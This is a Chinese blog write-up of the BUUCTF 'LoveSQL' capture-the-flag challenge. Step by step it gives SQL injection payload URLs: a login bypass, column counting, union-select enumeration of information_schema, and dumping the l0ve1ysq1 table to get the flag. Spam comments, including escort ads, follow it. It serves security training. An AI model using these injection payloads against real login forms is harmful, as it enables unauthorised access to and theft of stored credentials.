极客大挑战 2019]LoveSQL

打开页面,是一个登录框,先用随机密码尝试一下

账号:1' or 1=1#
密码:随便输啥都行

拿到了账号和密码

尝试进行MD5解码,失败,继续注入

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=admin' order by 3%23&password=123 正常
http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=admin' order by 4%23&password=123 报错

查看回显点

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,2,3%23&password=123 这里要使用不存在的数据,否则无法回显

查询数据库名并爆表

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,database(),3%23&password=123

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=123

爆破l0ve1ysq1中的字段

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=123

直接爆破字段,拿到flag

http://b793d531-25cd-46e3-a1f1-974f1752fbc2.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=123

点赞
  1. escort bayan说道:

    Greetings! Very helpful advice in this particular post! It is the little changes that produce the greatest changes. Thanks for sharing! Rea Marlowe Jemimah

  2. escort bayan说道:

    Thankfulness to my father who informed me about this webpage, this webpage is truly remarkable.| Netta Jeddy Sarge

  3. handjob hunnies说道:

    Thank you ever so for you blog post. Thanks Again. Keep writing. Wilona Giavani Steffy

  4. Data HK说道:

    Your content comes across a bit rushed-you are usually quite eloquent in your writing. Bekki Roarke Azaria

  5. Clydecrync说道:

    заказать фотошоп

发表评论

昵称和uid可以选填一个,填邮箱必填(留言回复后将会发邮件给你)
tips:输入uid可以快速获得你的昵称和头像